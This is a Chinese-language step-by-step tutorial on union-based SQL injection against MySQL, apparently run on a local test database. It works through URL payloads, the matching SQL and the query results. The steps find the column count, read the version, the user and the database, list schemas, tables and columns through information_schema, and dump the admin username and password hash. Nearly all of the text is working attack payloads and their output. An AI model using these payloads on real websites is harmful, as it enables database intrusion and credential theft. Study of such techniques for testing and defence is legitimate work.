0x00 概要
在页面有显示位的情况下使用
0x01 测试表数据
# 测试表数据: test;
mysql> select * from test;
+----+----------+------+---------+
| id | test | map | content |
+----+----------+------+---------+
| 1 | 1 | NULL | NULL |
| 29 | t | NULL | NULL |
| 28 | - | NULL | NULL |
| 27 | a | NULL | NULL |
| 5 | 2 | NULL | NULL |
| 26 | 9 | NULL | NULL |
| 25 | 8 | NULL | NULL |
| 24 | 7 | NULL | NULL |
| 23 | 6 | NULL | NULL |
| 22 | 5 | NULL | NULL |
| 21 | 4 | NULL | NULL |
| 14 | 3 | NULL | NULL |
| 20 | 4 | NULL | NULL |
| 19 | security | NULL | NULL |
| 18 | 4 | NULL | NULL |
+----+----------+------+---------+
15 rows in set (0.00 sec)
# 测试管理表: tdb_admin;
mysql> select * from tdb_admin;
+----+----------+----------------------------------+
| id | username | password |
+----+----------+----------------------------------+
| 1 | admin | 7fef6171469e80d32c0559f88b377245 |
+----+----------+----------------------------------+
1 row in set (0.00 sec)
0x02 查看列数
web语句: http://www.test.com/sql.php?id=1 order by 4
数据库语句: select * from test where id=1 order by 4
0x03 爆数据库版本
web语句: http://www.test.com/sql.php?id=-1 union select 1, @@VERSION, 3, 4
数据库语句: select * from test where id=-1 union select 1, @@VERSION, 3, 4
mysql> select * from test where id=-1 union select 1, @@VERSION, 3, 4;
+----+--------+------+---------+
| id | test | map | content |
+----+--------+------+---------+
| 1 | 5.5.53 | 3 | 4 |
+----+--------+------+---------+
1 row in set (0.00 sec)
0x04 爆当前连接用户
web语句: http://www.test.com/sql.php?id -1 union select 1, user(), 3, 4
数据库语句: select * from test where id=-1 union select 1, user(), 3, 4;
mysql> select * from test where id=-1 union select 1, user(), 3, 4;
+----+----------------+------+---------+
| id | test | map | content |
+----+----------------+------+---------+
| 1 | root@localhost | 3 | 4 |
+----+----------------+------+---------+
1 row in set (0.00 sec)
0x05 爆当前连接的数据库
web语句: http://www.test.com/sql.php?id=-1 union select 1, database(), 3,
数据库语句: select * from test where id=-1 union select 1, database(), 3, 4;
mysql> select * from test where id=-1 union select 1, database(), 3, 4;
+----+------+------+---------+
| id | test | map | content |
+----+------+------+---------+
| 1 | test | 3 | 4 |
+----+------+------+---------+
1 row in set (0.00 sec)
0x06 爆库名
注意: LIMIT 0 修改会显示其他库名
例如:
修改为0 就是出1库
修改为1 就是出2库
web语句: http://www.test.com/sql.php?id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1
数据库语句: select * from test where id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1
mysql> select * from test where id=-1 union select 1,schema_name,3,4 from information_schema.schemata limit 1,1;
+----+-------+------+---------+
| id | test | map | content |
+----+-------+------+---------+
| 1 | 74cms | 3 | 4 |
+----+-------+------+---------+
1 row in set (0.00 sec)
0x07 爆表名
注意: table_schema=xxx 修改为其他库会爆出其他库的数据
例如:
table_schema=database() 会获取当前连接的库数据
table_schema=’test’ 会获取test库数据
web语句: http://www.test.com/sql.php?id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=DATABASE() limit 0,1;
数据库语句: select * from test where id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=DATABASE() limit 0,1;
mysql> select * from test where id=-1 union select 1,table_name,3,4 from information_schema.tables where table_schema=DATABASE() limit 0,1;
+----+-----------+------+---------+
| id | test | map | content |
+----+-----------+------+---------+
| 1 | tdb_admin | 3 | 4 |
+----+-----------+------+---------+
1 row in set (0.00 sec)
0x08 暴字段
table_schema = “xx” 要爆的数据库名
table_name = “xx” 要爆的表名
limit 0 表示要爆的位置
例如:
表tdb_admin的字段为 id,usernam,password
limit 0 = id
limit 1 = username
limit 2 = password
web语句: http://www.test.com/sql.php?id=-1 union select 1,column_name,3,4 from information_schema.columns where table_schema=DATABASE() AND table_name=’tdb_admin’ limit 1,1;
数据库语句: select * from test where id = -1 union select 1,column_name,3,4 from information_schema.columns where table_schema=DATABASE() AND table_name=’tdb_admin’ limit 1,1;
mysql> select * from test where id=-1 union select 1,column_name,3,4 from information_schema.columns where table_schema=DATABASE() AND table_name='tdb_admin' limit 1,1;
+----+----------+------+---------+
| id | test | map | content |
+----+----------+------+---------+
| 1 | username | 3 | 4 |
+----+----------+------+---------+
1 row in set (0.01 sec)
0x09 爆内容
注意: limit 0 表示要显示那一条数据
limit 0 表示第一条
limit 1 表示第二条
web语句: http://www.test.com/sql.php?id=-1 union select 1,concat(0x7e,id,0x3a,username,0x3a,password,0x7e),3,4 from test.tdb_admin limit 0,1
数据库语句: select * from test where id=-1 union select 1,concat(0x7e,字段名,0x3a,字段名,0x3a,字段名,0x7e),3,4 from 库名.表名 limit 0,1;
mysql> select * from test where id=-1 union select 1,concat(0x7e,id,0x3a,username,0x3a,password,0x7e),3,4 from test.tdb_admin limit 0,1;
+----+--------------------------------------------+------+---------+
| id | test | map | content |
+----+--------------------------------------------+------+---------+
| 1 | ~1:admin:7fef6171469e80d32c0559f88b377245~ | 3 | 4 |
+----+--------------------------------------------+------+---------+
1 row in set (0.00 sec)